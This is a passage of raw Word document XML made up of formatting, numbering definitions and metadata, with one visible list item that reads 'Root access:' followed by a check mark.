          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Root access: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D11052" w14:textId="77777777" w:rsidR="006518D8" w:rsidRPr="007B3FC5" w:rsidRDefault="006518D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006518D8" w:rsidRPr="007B3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655B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27B6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352F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E66E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54192"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83F4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3596D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F808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C3997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3014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C919F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EEE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5676FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BDC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86D5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2782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861278"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6932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491CB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A58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CC6591"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6948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1F093E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74A4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BD1E8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D5E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2F03D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B66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2067650">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="435373070">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="174612437">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2083327658">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="281688506">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="80293912">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="661393914">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="228346910">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="143620356">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1380398736">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1774281442">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2040935161">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="791944654">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1543664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FC5"/>
    <w:rsid w:val="000633E4"/>
    <w:rsid w:val="002775D9"/>
    <w:rsid w:val="006518D8"/>
    <w:rsid w:val="00755A0C"/>
    <w:rsid w:val="007B3FC5"/>
    <w:rsid w:val="00932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A44E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60418DD6-8177-47CB-8ACE-2CFFA06C2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F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F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FC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FC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FC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F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F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B3FC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B3FC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B3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F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F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F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FC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3FC5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710</Words>
  <Characters>4049</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>33</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Misra</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Aniket Misra</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-24T09:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T09:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>